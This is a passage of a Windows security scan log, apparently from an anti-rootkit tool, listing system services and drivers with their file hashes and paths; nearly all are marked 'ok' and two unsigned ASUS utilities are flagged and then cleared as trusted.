21:27:00.0486 0x0ce4  amdkmdag - ok
21:27:00.0495 0x0ce4  [ 0E2B0B8C871A4BDA103B857E07CAC833, 80A3DB55FEBD3C6FEC0C6078D998F2B3A802425569F57ABCB2AF0D5C37D4A280 ] amdkmdap        C:\WINDOWS\System32\DriverStore\FileRepository\c0313676.inf_amd64_96bbc33bec5c7fae\atikmpag.sys
21:27:00.0509 0x0ce4  amdkmdap - ok
21:27:00.0514 0x0ce4  [ 395D56FA2E22A10AE4774440D086F559, 24D7CBE9B82DC8900D9A5E345347FEC330D47FDBD1517A2AC10218BA2A9DFAA9 ] AmdPPM          C:\WINDOWS\System32\drivers\amdppm.sys
21:27:00.0524 0x0ce4  AmdPPM - ok
21:27:00.0528 0x0ce4  [ EB729A9ADCB9F9C406B533F95E2F67D4, EDCB8E39C503FF30ECB82F368242179E2788C12B4FD9B557F38380A934E7D8E7 ] amdsata         C:\WINDOWS\system32\drivers\amdsata.sys
21:27:00.0534 0x0ce4  amdsata - ok
21:27:00.0541 0x0ce4  [ 3B5C5C696F33FE61F1922533B03B9316, C9BAAA9B02547C66A276A31958DFD2A289C5963A4EE3FF306535565240D816CC ] amdsbs          C:\WINDOWS\system32\drivers\amdsbs.sys
21:27:00.0550 0x0ce4  amdsbs - ok
21:27:00.0553 0x0ce4  [ A7D45A303FF8A9493C96C4B804051E6E, 6074C264876A398039D3F89905A486ABA5BDACA038B79920A34323B38CFCB358 ] amdxata         C:\WINDOWS\system32\drivers\amdxata.sys
21:27:00.0559 0x0ce4  amdxata - ok
21:27:00.0564 0x0ce4  [ 5180537517C27375B1F2CB37ED599FAF, 121BF0E3BDE068CC1E1E9B24DC334BA29348725E9BFB790699E4CC66664A4C3D ] AppID           C:\WINDOWS\system32\drivers\appid.sys
21:27:00.0573 0x0ce4  AppID - ok
21:27:00.0577 0x0ce4  [ F7FEBF66A705F18DC063DFD259F15102, 394DA8A7355573C4D81C375450DF5C5B2FA6360E246B06FDE8E7F9ADF21360FA ] AppIDSvc        C:\WINDOWS\System32\appidsvc.dll
21:27:00.0587 0x0ce4  AppIDSvc - ok
21:27:00.0591 0x0ce4  [ 13D7FEA71091D1EAD8ADDD10BFFEA06D, A707CAC76CBF0334E2FCE3220147B382F5E44DEF9E23DD459CF7C40F27771695 ] Appinfo         C:\WINDOWS\System32\appinfo.dll
21:27:00.0602 0x0ce4  Appinfo - ok
21:27:00.0605 0x0ce4  [ EAF36A714E16A69B8B4ED7591CBA77B6, 11FE2A5D991FB8AF78F4E78FB6DF02005EC5404DC298FE2D4E7774BB0011AB52 ] applockerfltr   C:\WINDOWS\system32\drivers\applockerfltr.sys
21:27:00.0618 0x0ce4  applockerfltr - ok
21:27:00.0623 0x0ce4  [ 290469FC9FDE400248DA3E528E729BC2, D9ABBEB76673D136698AA2F53C8EB1EAFBBDE365ACCA9AE348523B346143CA9C ] AppMgmt         C:\WINDOWS\System32\appmgmts.dll
21:27:00.0634 0x0ce4  AppMgmt - ok
21:27:00.0645 0x0ce4  [ 82432C4D8E83A94C7644A61697113B4A, 97105B0089A1E02484B202AC58610A5DCFFF6F64402B67F9E8B6FF3A0FDB6E26 ] AppReadiness    C:\WINDOWS\system32\AppReadiness.dll
21:27:00.0664 0x0ce4  AppReadiness - ok
21:27:00.0678 0x0ce4  [ B4F1CF9D0BE52DB8883655C469AAF521, D907B0838E70EBF5D55F00A87222CABE8904FEB8483F4F8168157F27A4EDB6EE ] AppVClient      C:\WINDOWS\system32\AppVClient.exe
21:27:00.0697 0x0ce4  AppVClient - ok
21:27:00.0702 0x0ce4  [ 2D2DF2463FACFBF2FEE39DCCDF49D1B5, F083C1B5B2284AB818431ECC6C9A61EBAFA241840727B97DD0E3B4FF0CBD07C5 ] AppvStrm        C:\WINDOWS\system32\drivers\AppvStrm.sys
21:27:00.0709 0x0ce4  AppvStrm - ok
21:27:00.0714 0x0ce4  [ B86E646CE67FE9D75C0D762B19B465FC, B50C45A06AC6862DB4B183F567D55AE289EB05E6A1B32CC3AEBB6163C4296D79 ] AppvVemgr       C:\WINDOWS\system32\drivers\AppvVemgr.sys
21:27:00.0722 0x0ce4  AppvVemgr - ok
21:27:00.0727 0x0ce4  [ 2207D2A001A3C30B825F191CD2A76C91, A43EA8CB9E2D1A1FB2DDC738827514588BFFA420A2D618DBCA55614BE2E3B45D ] AppvVfs         C:\WINDOWS\system32\drivers\AppvVfs.sys
21:27:00.0735 0x0ce4  AppvVfs - ok
21:27:00.0774 0x0ce4  [ EAE1B6D86D661BFC494A3975583F722C, 9F6C4254B62299DAE712B9B6447CF5F6D69B529FE736427D79C2327F5B022670 ] AppXSvc         C:\WINDOWS\system32\appxdeploymentserver.dll
21:27:00.0838 0x0ce4  AppXSvc - ok
21:27:00.0845 0x0ce4  [ 6E456A94B9BD7F6B4758729BCEDE40C3, 2F3146AC960992FA947A8E8C4D5497624A5BC69B7A3EECA117AD599C70DDE8E3 ] arcsas          C:\WINDOWS\system32\drivers\arcsas.sys
21:27:00.0852 0x0ce4  arcsas - ok
21:27:00.0868 0x0ce4  [ BBF8F831C7720DD5135D8C4C8325187A, 2630C68200D7BD49A5772830D6B369C0EC337C2558A9562DD564DF042249ECC0 ] asComSvc        C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe
21:27:00.0886 0x0ce4  asComSvc - ok
21:27:00.0898 0x0ce4  [ E536856E96A7605EBF580D62A868E5FE, 70D0F6ECB05E923C1B274605CB3320091D35D7622003FF7E4806645519C70F01 ] ASGT            C:\Windows\SysWOW64\ASGT.exe
21:27:00.0902 0x0ce4  ASGT - detected UnsignedFile.Multi.Generic ( 1 )
21:27:01.0310 0x0ce4  Detect skipped due to KSN trusted
21:27:01.0310 0x0ce4  ASGT - ok
21:27:01.0324 0x0ce4  [ 5F1091FA113607C9C9B2ECF4FBC76F37, F4406635C555A942242F40CACEC7EFD2FED47103C191CB3C2EDF21EE78C8122E ] asHmComSvc      C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe
21:27:01.0341 0x0ce4  asHmComSvc - ok
21:27:01.0345 0x0ce4  [ 798DE15F187C1F013095BBBEB6FB6197, 436CCAB6F62FA2D29827916E054ADE7ACAE485B3DE1D3E5C6C62D3DEBF1480E7 ] AsIO            C:\WINDOWS\syswow64\drivers\AsIO.sys
21:27:01.0349 0x0ce4  AsIO - ok
21:27:01.0357 0x0ce4  [ 9A1BAED68C52FA4668C3933AA93E9530, B92B2E9DBFFBB329D6009A72A7B766350833A1F9CAA74E63C380A8BA0B580BE0 ] AsusFanControlService C:\Program Files (x86)\ASUS\AsusFanControlService\1.06.13\AsusFanControlService.exe
21:27:01.0367 0x0ce4  AsusFanControlService - detected UnsignedFile.Multi.Generic ( 1 )
21:27:01.0773 0x0ce4  Detect skipped due to KSN trusted
21:27:01.0773 0x0ce4  AsusFanControlService - ok
21:27:01.0778 0x0ce4  [ 766F3A7E42AFCF74265FAC78987D1665, 8FE82913DF5CF79B49B28B3CD782AF09FF30585A37473AE3E518A26C5D6453D0 ] AsyncMac        C:\WINDOWS\System32\drivers\asyncmac.sys
21:27:01.0785 0x0ce4  AsyncMac - ok
21:27:01.0788 0x0ce4  [ 01733BEEE02E51F712330D5909BD701C, A583B482DBE701A752EDFDEAE2EF16D7160DFEA6077E0C8EF013828E285D960A ] atapi           C:\WINDOWS\system32\drivers\atapi.sys
21:27:01.0794 0x0ce4  atapi - ok
21:27:01.0850 0x0ce4  [ D03E551165C72F2A4BBDDC566EAA819E, 8047E2D20724B464B481F06C3AC1FA5734E97F7EC0D86EFEECD76480C84B3959 ] athr            C:\WINDOWS\System32\drivers\athwnx.sys
21:27:01.0943 0x0ce4  athr - ok
21:27:01.0953 0x0ce4  [ 13C3C48F9614F3FEE858DD7C8E39E9EC, 54F30BFA71B38D404572DAA51B6B57D589C1C99B16F2F14FB69CDA1B76FAAB74 ] AtiHDAudioService C:\WINDOWS\system32\drivers\AtihdWT6.sys
21:27:01.0961 0x0ce4  AtiHDAudioService - ok
21:27:01.0972 0x0ce4  [ 8FF48F1C894EDC6AA55CCF01AE1338EC, 446654CC72062061F2F80DEAA30C4F575B34BAC31D50C174F4DA20B7ED2D13C7 ] AudioEndpointBuilder C:\WINDOWS\System32\AudioEndpointBuilder.dll
21:27:01.0991 0x0ce4  AudioEndpointBuilder - ok
21:27:02.0012 0x0ce4  [ DCD20FAF0485C59032397DA2F93746AE, BED193535533E7264FD29BC0AE1BBD6F97EA92FF117EF4A527B0677E630B94EF ] Audiosrv        C:\WINDOWS\System32\Audiosrv.dll
21:27:02.0046 0x0ce4  Audiosrv - ok
21:27:02.0071 0x0ce4  [ DA978AB6E0AAEA82235C943DEED3484C, 42A3ADB76B9E5F7309992C9737956CBE1706DD0FEC9565F493EDD104D8E64C97 ] avc3            C:\WINDOWS\system32\DRIVERS\avc3.sys
21:27:02.0098 0x0ce4  avc3 - ok
21:27:02.0114 0x0ce4  [ 09A3015AEA14CF9A4ECDE1CEA6AFE0AA, 77A58DE0961F1C2BD9627A975EF661A63EA5E4A3361433353408EABCE6869317 ] avckf           C:\WINDOWS\system32\DRIVERS\avckf.sys
21:27:02.0131 0x0ce4  avckf - ok
21:27:02.0136 0x0ce4  [ 6086B5EE0DA4600B2EC2725D82DEB74E, C67CA7021D710CFDCF62B17A2B2890E61E4F1E3D956312688454FD85738C303F ] AxInstSV        C:\WINDOWS\System32\AxInstSV.dll
21:27:02.0146 0x0ce4  AxInstSV - ok
21:27:02.0156 0x0ce4  [ 0914A5E66C0775CE11960452A6434FEC, 978C1E20023841FBFEF0CEAFE09EDB679612C8E5986C6E40C1F6D0835112D13E ] b06bdrv         C:\WINDOWS\system32\drivers\bxvbda.sys
21:27:02.0169 0x0ce4  b06bdrv - ok
21:27:02.0173 0x0ce4  [ F8129321B1874D4386F7FEB754BC3380, 7264E7E2A339E456C0A1A40FDFAE0D202905467400B93FA0700498B86172337F ] BasicDisplay    C:\WINDOWS\System32\drivers\BasicDisplay.sys
21:27:02.0180 0x0ce4  BasicDisplay - ok
21:27:02.0184 0x0ce4  [ CFD199354CC01F5857F3F27BC1BA2DBE, 8C3173A28EE11CE62789DC86F2DA56944478015ECB1BA02E1AFFDEDF5280373C ] BasicRender     C:\WINDOWS\System32\drivers\BasicRender.sys
21:27:02.0191 0x0ce4  BasicRender - ok
21:27:02.0195 0x0ce4  [ 739D089777D2B66DBE7201E5EA4BA2D7, 9AD12E18A042C5B8EFB19297BC2E7BD1FEF75A138FEFB64C6BF0261FD3E53AB1 ] bcmfn2          C:\WINDOWS\System32\drivers\bcmfn2.sys
21:27:02.0202 0x0ce4  bcmfn2 - ok
21:27:02.0205 0x0ce4  [ 4B190ACAE90EC79AD4D43EFCD3743DA0, 9D5187D4E1DF1672DEA2EF5C910FCA08BD8ED0573A55DF774E5300312ED87E05 ] bdelam          C:\WINDOWS\system32\drivers\bdelam.sys
21:27:02.0213 0x0ce4  bdelam - ok
21:27:02.0220 0x0ce4  [ C3B27514035315E3C1FCE64E69E253ED, 03AF100927077AD608C5EA47A17081CEA849F44C471AF978F410B83E2ABA5AE7 ] BDESVC          C:\WINDOWS\System32\bdesvc.dll
21:27:02.0235 0x0ce4  BDESVC - ok
21:27:02.0241 0x0ce4  [ 14F686FA27C2914128031504B70D2B5E, BED77F4A6DC8B30ADB698FBCC00153D924310188EFBE22ADD2BAA3321C746556 ] bdfwfpf         C:\Program Files\Common Files\Bitdefender\Bitdefender Firewall\bdfwfpf.sys
21:27:02.0247 0x0ce4  bdfwfpf - ok
21:27:02.0251 0x0ce4  [ D8FAF7CFBC81E5E15CA7A7EC8EE1B409, 75E60DF2147DFB109E628FDF80EB1BFA5360E5935BB9237B67053588F906E1B1 ] BDVEDISK        C:\WINDOWS\system32\DRIVERS\bdvedisk.sys
21:27:02.0256 0x0ce4  BDVEDISK - ok
21:27:02.0259 0x0ce4  [ ED03D2ACE378C9EB8BB957ABBD85B951, E9AE3025DC4956B736651B20AEA665909C2B468F9AE3E317F545DD4EEEA7D9E8 ] Beep            C:\WINDOWS\system32\drivers\Beep.sys
21:27:02.0265 0x0ce4  Beep - ok
21:27:02.0279 0x0ce4  [ 1FDC6CB56572203E6F4BF4E3FB30B886, 81D5C77C823DC078EEEB2DABEE5203D542C824E04FEDD96AA58F96037C065155 ] BFE             C:\WINDOWS\System32\bfe.dll
21:27:02.0302 0x0ce4  BFE - ok
21:27:02.0321 0x0ce4  [ 5C0D4DBACB90D9ECE77907F4F6CF9EF6, FC29F03FB7E58A9ED17A34BC2D8E39533070B8B23D1A110622C3A213BF48CD2D ] BITS            C:\WINDOWS\System32\qmgr.dll
21:27:02.0352 0x0ce4  BITS - ok
21:27:02.0357 0x0ce4  [ 2342B8619193B0D9FAC0D02C69DCE74A, 06A1512C9750ACD154DE8873DE6628355B7195759CE54FA96097EA6D56BE320E ] bowser          C:\WINDOWS\system32\DRIVERS\bowser.sys
21:27:02.0365 0x0ce4  bowser - ok
21:27:02.0379 0x0ce4  [ 04B27B2DE2981E79E078FAAC3AA8748F, 716F00D507D37CC549BE665D957186F2CF7B2B8C9B959B0FE8D01EBED2F154C6 ] BrokerInfrastructure C:\WINDOWS\System32\bisrv.dll
21:27:02.0403 0x0ce4  BrokerInfrastructure - ok
21:27:02.0408 0x0ce4  [ 9C7F445B018AB4744B6E0C657B5D1833, 83D04F5E3D4BA46BBD8A67764A60F5731F86B0BE3A85C2858E002ABCC362F592 ] Browser         C:\WINDOWS\System32\browser.dll
21:27:02.0417 0x0ce4  Browser - ok
21:27:02.0421 0x0ce4  [ AF57F0B0E284BE06860A7B701341324D, F94E44C777FDC049158B7BF73DAFCDB103D08493AC898D1C928771650F664412 ] BthAvrcpTg      C:\WINDOWS\System32\drivers\BthAvrcpTg.sys
21:27:02.0428 0x0ce4  BthAvrcpTg - ok
21:27:02.0432 0x0ce4  [ 4C0FCF1BF33A706D2D23C122D5AF990C, 8FF78C6ABF1DB8D9EF318D2C71EA29E65EC80BCA24BC53CE1F521182733383CC ] BthEnum         C:\WINDOWS\System32\drivers\BthEnum.sys
21:27:02.0441 0x0ce4  BthEnum - ok
21:27:02.0445 0x0ce4  [ 729CC10B1658178F0F009FE0E9159281, B0F692CAB2BE47415C8A8CCCE8D53CDDF2B70518536ACF91CF96D74ADD04AF9C ] BthHFEnum       C:\WINDOWS\System32\drivers\bthhfenum.sys
21:27:02.0453 0x0ce4  BthHFEnum - ok
21:27:02.0456 0x0ce4  [ 336A9C0254A0178ED50281B6EDF5B836, C9C454C6EC4FF5897B1873A7E90D1CE8122E43783E978A570CEA75E15F65DE97 ] bthhfhid        C:\WINDOWS\System32\drivers\BthHFHid.sys
21:27:02.0463 0x0ce4  bthhfhid - ok
21:27:02.0471 0x0ce4  [ D8428BEF4033C7BFCD981074E2318F89, 9C0692F8387BAD94CCA4E36B59701A7A7B8FDCB5377B4C2CA75424583835E112 ] BthHFSrv        C:\WINDOWS\System32\BthHFSrv.dll
21:27:02.0487 0x0ce4  BthHFSrv - ok
21:27:02.0491 0x0ce4  [ 096C2A149591410A44F1C6CBE4866729, 4ED981A9AA10979C305DEC6E02DD0FF445C64055B5493007BDD5283B4626C0B9 ] BthLEEnum       C:\WINDOWS\system32\DRIVERS\Microsoft.Bluetooth.Legacy.LEEnumerator.sys
21:27:02.0499 0x0ce4  BthLEEnum - ok
21:27:02.0503 0x0ce4  [ 5428242193611BF91DDBF4F58900A55A, 91D59B0D0C7CA3DBBA8CA7CAD1E24845A224F451FC1880BE8CB7C1585AC79080 ] BTHMODEM        C:\WINDOWS\System32\drivers\bthmodem.sys
21:27:02.0511 0x0ce4  BTHMODEM - ok
21:27:02.0515 0x0ce4  [ E39223EAA36AC546A03ABE213C960A37, D1CFCC3BE2DD76BAE1EA927E9F32BD178D5C5593A4CD34E81038BB692957894E ] BthPan          C:\WINDOWS\System32\drivers\bthpan.sys
21:27:02.0524 0x0ce4  BthPan - ok
21:27:02.0540 0x0ce4  [ 622833A26A27F15F42CE0888B1C70472, 9EED4C69DD955AE591270F0E371BEA256AA6DD9C527231BAD191FF3ED3A0826E ] BTHPORT         C:\WINDOWS\system32\DRIVERS\BTHport.sys
21:27:02.0567 0x0ce4  BTHPORT - ok
21:27:02.0573 0x0ce4  [ 6927D295017E9F1A5D655A8F3A122672, 4B686C93056924580390440B49C721BD9039D5C972994D8EA96CA848B786B693 ] bthserv         C:\WINDOWS\system32\bthserv.dll
21:27:02.0582 0x0ce4  bthserv - ok
21:27:02.0587 0x0ce4  [ FA5CE6301192DD6ED4AA747B2C88FD42, F06A7748FCB6BBF0BB0A8348F505A1703EF2D1B59DC5BA6B600951200463F876 ] BTHUSB          C:\WINDOWS\system32\DRIVERS\BTHUSB.sys
21:27:02.0595 0x0ce4  BTHUSB - ok
21:27:02.0598 0x0ce4  [ 102CAA11BA89290D48FBFD2E04274BA0, 9C6786AD6C8BE5AF7538BAD553C401B0D7443E533CDE59E975CF3E07EF262F0C ] buttonconverter C:\WINDOWS\System32\drivers\buttonconverter.sys
21:27:02.0605 0x0ce4  buttonconverter - ok
21:27:02.0608 0x0ce4  [ 029434AC0A3935F9125ABBD08BF7C30B, 742338B882488CA83F502ACEBFEDC2783B8D9D6C391FE1088988276315A065F6 ] CAD             C:\WINDOWS\System32\drivers\CAD.sys
21:27:02.0614 0x0ce4  CAD - ok
21:27:02.0618 0x0ce4  [ 307AE8BC9B45772DA02FB952A1D86C35, 4983AC71C8E164D9E6669D345925B4FBEDD0A0A4566887E7ECC56C996B66DBD4 ] CapImg          C:\WINDOWS\System32\drivers\capimg.sys
21:27:02.0627 0x0ce4  CapImg - ok
21:27:02.0630 0x0ce4  [ B6E5AD7C83A5254DEE9D86023C0E5A81, 40F297406A025378A6273535475C1FF8C99BC6502B17C0E161131DA754D7974B ] cdfs            C:\WINDOWS\system32\DRIVERS\cdfs.sys
21:27:02.0640 0x0ce4  cdfs - ok
21:27:02.0655 0x0ce4  [ 00C7849679FCF4AE8DA78DC16BDDA369, CCEDC195D5D9512BA9E50FF586CB4B7AB9AE7091E71A24D46A934E97D84DFEBD ] CDPSvc          C:\WINDOWS\System32\CDPSvc.dll
21:27:02.0682 0x0ce4  CDPSvc - ok
21:27:02.0693 0x0ce4  [ 618DA70D0D90DF3602259C1B121794DD, D2AF7967DE38F3B7C10824A1C900A145F45C57C0F179753A85989406600C4279 ] CDPUserSvc      C:\WINDOWS\System32\CDPUserSvc.dll
21:27:02.0712 0x0ce4  CDPUserSvc - ok
21:27:02.0719 0x0ce4  [ ABE77AD954BC3D72F559CF0C381E50BC, D0F24B023D7CADD4893AAF223A9BAC00B2C58D552E0C314B506C01767FB74133 ] cdrom           C:\WINDOWS\System32\drivers\cdrom.sys
21:27:02.0728 0x0ce4  cdrom - ok
21:27:02.0734 0x0ce4  [ 0EC94DA356D89CACD89B6E139E4D0A7D, 2F887681FDD5AB787154403E34623B1DFB61C70DAE5E2BFF1565E100F228870B ] CertPropSvc     C:\WINDOWS\System32\certprop.dll
21:27:02.0745 0x0ce4  CertPropSvc - ok
21:27:02.0752 0x0ce4  [ 05EA22CFC40EDE05BF6E3BC782E5204C, F0C9C692FC31387E9D19426D3253317B6BA86D7118E3884C11E3287695006443 ] cht4iscsi       C:\WINDOWS\system32\drivers\cht4sx64.sys
21:27:02.0763 0x0ce4  cht4iscsi - ok
21:27:02.0793 0x0ce4  [ 863E1C9F6750446DFB9EDCAEC3531367, 88C5EE76FD85640EB1440DEFC7B6CB918E18DC09507BA91FAE285370B8C7D56A ] cht4vbd         C:\WINDOWS\System32\drivers\cht4vx64.sys
21:27:02.0830 0x0ce4  cht4vbd - ok
21:27:02.0834 0x0ce4  [ 3E416539352B007AD0610BF34AC15D31, E2041129770B24AE95C5EC4B507477C72DFE8CB08D412E2621BF67207F9DEB8C ] circlass        C:\WINDOWS\System32\drivers\circlass.sys
21:27:02.0842 0x0ce4  circlass - ok
21:27:02.0844 0x0ce4  [ 616E1ED94FA7F96D429D985FDB203D2E, EA681C442AA0F7D424C8DABD8D1C14653E61BDE740C0BC4C6C308B5FB4FE67AA ] CldFlt          C:\WINDOWS\system32\drivers\cldflt.sys
21:27:02.0856 0x0ce4  CldFlt - ok
21:27:02.0864 0x0ce4  [ 96C01F97576D2542FCBD28E13C8CC6A1, 98E2501197B97399EB1F7C8AA96B5696931736E44400314E768A6C029B9E1C62 ] CLFS            C:\WINDOWS\system32\drivers\CLFS.sys
21:27:02.0874 0x0ce4  CLFS - ok
21:27:02.0889 0x0ce4  [ A5CA2992D42DB271DF933F49676E57DE, 7CC6B2908D9E2EDF848949C78433FAEC5526AE38307D095AA0EC66BFC45AEE3A ] ClipSVC         C:\WINDOWS\System32\ClipSVC.dll
21:27:02.0908 0x0ce4  ClipSVC - ok
21:27:02.0911 0x0ce4  [ 5118CFC33BBB51C7E3ED441B7085AD26, 8D33864FF750926C4B95827FFAD24C558DE8A90FC5B2663084DEAB5ADBBFAFD2 ] clreg           C:\WINDOWS\System32\drivers\registry.sys
21:27:02.0918 0x0ce4  clreg - ok
21:27:02.0924 0x0ce4  [ 232F3A3AC3A2FB32C5C46503A6517073, 9E0232E095471E6C8825E870F5842838F1AE515E56410F6A5CC3D58A9A4AF33A ] CmBatt          C:\WINDOWS\System32\drivers\CmBatt.sys
21:27:02.0931 0x0ce4  CmBatt - ok
21:27:02.0942 0x0ce4  [ 3413CE81E02C091F33C4C3DD3071630F, 4758A2BB2FD453E9867C04CC420D12B279BB97E3C4E664A7058EA5F1EC63D04C ] CNG             C:\WINDOWS\system32\Drivers\cng.sys
21:27:02.0957 0x0ce4  CNG - ok
21:27:02.0961 0x0ce4  [ E1BFF774FF67CA951A5DFF0E104FB132, 68809C4B72C54CEDE3AD33F5634E15A0225A67B391F9012EC7CEBA8AFC6EC3D5 ] cnghwassist     C:\WINDOWS\system32\DRIVERS\cnghwassist.sys
21:27:02.0967 0x0ce4  cnghwassist - ok
21:27:02.0976 0x0ce4  [ DFDAEDB857BC18764F0D8ECDCC3C1499, AE12E908BAF53C605A17A9FB1AFD6BFBEC75EBE45D893541281473C197C71FED ] CompositeBus    C:\WINDOWS\System32\DriverStore\FileRepository\compositebus.inf_amd64_de4c68ea4fb1be53\CompositeBus.sys
21:27:02.0983 0x0ce4  CompositeBus - ok
21:27:02.0986 0x0ce4  COMSysApp - ok
21:27:02.0989 0x0ce4  [ 04532711732BE9DBC364E88E4A9EC18A, FCEB1F486E146A3FE7307397C1EB6760BFD8A327545F81C546F7134B08615B9E ] condrv          C:\WINDOWS\system32\drivers\condrv.sys
21:27:02.0995 0x0ce4  condrv - ok
21:27:03.0010 0x0ce4  [ D734EBC7E66D82D543C874ED1FE9B40D, 8381E7B619BB36A1896C2A472AB830B775F317BE6ABDE98E4F943337C21930E0 ] CoreMessagingRegistrar C:\WINDOWS\system32\coremessaging.dll
21:27:03.0030 0x0ce4  CoreMessagingRegistrar - ok
21:27:03.0037 0x0ce4  [ 1F7F1A15B807BC7B241BB2FEEA79BC92, D756E2247757C274F3470B46FCDBB63317C05E8E66FDA9DB7ABF3A6820933D4C ] CryptSvc        C:\WINDOWS\system32\cryptsvc.dll
21:27:03.0046 0x0ce4  CryptSvc - ok
21:27:03.0057 0x0ce4  [ EFB2A77F0CD1B8A79899C1D37B01CA86, 9FA32E0853FA93513ACA2CD4203DE8BC22268ABCA4BBDB366307C106F4FD5917 ] CSC             C:\WINDOWS\system32\drivers\csc.sys
21:27:03.0074 0x0ce4  CSC - ok
21:27:03.0087 0x0ce4  [ F010BDED808E86E1046F08865C11EDF2, 48FE0D176F7FA1F04685C0A1FD4FFB6464B6B88883D7D50E05C9C6C0636E895A ] CscService      C:\WINDOWS\System32\cscsvc.dll
21:27:03.0109 0x0ce4  CscService - ok
21:27:03.0114 0x0ce4  [ 994A369A2DFC62ADED1226C70F69D20D, 916AF63ADD92362F5361902AB4C1507086EAB8839BEC10DB65CDE0AAB20681DE ] dam             C:\WINDOWS\system32\drivers\dam.sys
21:27:03.0121 0x0ce4  dam - ok
21:27:03.0139 0x0ce4  [ 0E79A4C76CAAA0CFE9CA42C13E5AA086, C4D90EDA54216CC7897128D39517E4E18195BF28254796C6D0684E2C7DB90642 ] DcomLaunch      C:\WINDOWS\system32\rpcss.dll
21:27:03.0169 0x0ce4  DcomLaunch - ok
21:27:03.0178 0x0ce4  [ 1175E107082287A58A756239F48E1A73, 0DB2017061D94FAC95CEBD7C4729E42018A92698D72CEE3EA412A9D14DB8D552 ] defragsvc       C:\WINDOWS\System32\defragsvc.dll
21:27:03.0200 0x0ce4  defragsvc - ok
21:27:03.0209 0x0ce4  [ BBCAC50027D030E07EC7E5C36469FAFF, FEF39659F21D2AE676E4882FBAF5A881C534BB7EA26E5EFF9F7B5F8B952D6532 ] DeviceAssociationService C:\WINDOWS\system32\das.dll
21:27:03.0225 0x0ce4  DeviceAssociationService - ok
21:27:03.0229 0x0ce4  [ A2BACEBAC01BE7A6656B454E75C23262, C2C168718A341D48679AC4CA8005BD06E9F1F0D1F7C72D3C30A7A8CE1F665A43 ] DeviceInstall   C:\WINDOWS\system32\umpnpmgr.dll
21:27:03.0246 0x0ce4  DeviceInstall - ok
21:27:03.0257 0x0ce4  [ 5B84093D490A6B060C8BE60BA52C876F, D34A854418A66529B18313A50E6D7EAB982611AD9AB0335245AE764FE0602C22 ] DevicesFlowUserSvc C:\WINDOWS\System32\DevicesFlowBroker.dll
21:27:03.0280 0x0ce4  DevicesFlowUserSvc - ok
21:27:03.0284 0x0ce4  [ F08F70BBD833BAA3BF0D5E500CBEE6CC, 8BB99E6D96CB8B25036549030986EC267C26BF1FC66E4EB00A3E41FE3BB5DE70 ] DevQueryBroker  C:\WINDOWS\system32\DevQueryBroker.dll
21:27:03.0292 0x0ce4  DevQueryBroker - ok
21:27:03.0297 0x0ce4  [ 185A4519B7764F4DEF714D890A7A9FD2, 9805D9DB42D11582583EA3F0FFEE9EF2B0C536DA99A9A3D3863B2669B1CC34A7 ] Dfsc            C:\WINDOWS\system32\Drivers\dfsc.sys
21:27:03.0311 0x0ce4  Dfsc - ok
21:27:03.0315 0x0ce4  [ 9593475FBC857A05D93BFF4FA7323C2B, D2A958AF5EFDC6136A6ABB7F8D5FE1F84C967E79BEA96C5BE3661A0145DEB907 ] dg_ssudbus      C:\WINDOWS\system32\DRIVERS\ssudbus.sys
21:27:03.0322 0x0ce4  dg_ssudbus - ok
21:27:03.0329 0x0ce4  [ BC5188B3F35BB8070888441A2A740465, 05C18A3DC1BD96C6751E76DBF57C47E526A1F9DF5E013B20B69EA0159CD6CE56 ] Dhcp            C:\WINDOWS\system32\dhcpcore.dll
21:27:03.0343 0x0ce4  Dhcp - ok
21:27:03.0347 0x0ce4  [ 5DF493C7954890EEC65CC2A21D479F76, 67087AAAC2AF93F265077AA392444E32DC299918A843A8AECFBE73636A5F2314 ] diagnosticshub.standardcollector.service C:\WINDOWS\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
21:27:03.0356 0x0ce4  diagnosticshub.standardcollector.service - ok
21:27:03.0391 0x0ce4  [ F38183343C14B0C0BAB900640652257F, 2C42D206A552A527097BF586F338D89252B6F90044A54322757A4B74644E66E1 ] DiagTrack       C:\WINDOWS\system32\diagtrack.dll
21:27:03.0450 0x0ce4  DiagTrack - ok
21:27:03.0456 0x0ce4  [ 1203EA16F36C5BEB2509FB7CC03DC178, 195209CB711E5BDE24A50C88AA62F32E8AE26F6A83B423374FCA41444F55D1CE ] Disk            C:\WINDOWS\system32\drivers\disk.sys
21:27:03.0462 0x0ce4  Disk - ok
21:27:03.0472 0x0ce4  [ 626E3564A7588139DE2367E14F8CAAB2, 472530B6DD70F4A5E61A8572B0479A6DF3BE8B4DD1E021BF00D05B3553927463 ] DmEnrollmentSvc C:\WINDOWS\system32\Windows.Internal.Management.dll
21:27:03.0499 0x0ce4  DmEnrollmentSvc - ok
21:27:03.0502 0x0ce4  [ 038B8B76284BC291EC75B005BB3EB13F, FE7BD7CF833C4A96ABF4FD6EBAB829CC4D8096780A22A313035D7E49BBA12D36 ] dmvsc           C:\WINDOWS\System32\drivers\dmvsc.sys
21:27:03.0509 0x0ce4  dmvsc - ok
21:27:03.0512 0x0ce4  [ 32C76DFE2586EBECFFA4112E9196591C, 190C294F50B96B13D0B776F7C19DCB47EAACBEE999CBA50236CF8C856CF38B17 ] dmwappushservice C:\WINDOWS\system32\dmwappushsvc.dll
21:27:03.0527 0x0ce4  dmwappushservice - ok
21:27:03.0533 0x0ce4  [ FC3AA34608A69BDAC67E31FB70C8A720, 38815F527DF963B4A7D93895776DDD618BD29782B1FA74EB1A7319AE58739A06 ] Dnscache        C:\WINDOWS\System32\dnsrslvr.dll
21:27:03.0546 0x0ce4  Dnscache - ok
21:27:03.0552 0x0ce4  [ F08CB37830A1F9950E8B2F7B1F78CC7E, E4E75645893597F6A02B98DC4F126A664F5DEF7B1CD4C2DEE5CA8ED18DB64C9C ] dot3svc         C:\WINDOWS\System32\dot3svc.dll
21:27:03.0565 0x0ce4  dot3svc - ok
21:27:03.0570 0x0ce4  [ 3425E26D0A7792F2EE7745C0336C2062, 54A3AFFC31C2641BCE1877F2CBA61D2CD7191BA39FD5B3659491E4E307570C1E ] DPS             C:\WINDOWS\system32\dps.dll
21:27:03.0583 0x0ce4  DPS - ok
21:27:03.0586 0x0ce4  [ 3D934A1C02EB6979CF45C70A71F580EC, 279B325E18ABF82FF523095D8D5958A3A48C7B7A4F64BD562DDED1D0662B608A ] drmkaud         C:\WINDOWS\system32\DRIVERS\drmkaud.sys
21:27:03.0591 0x0ce4  drmkaud - ok
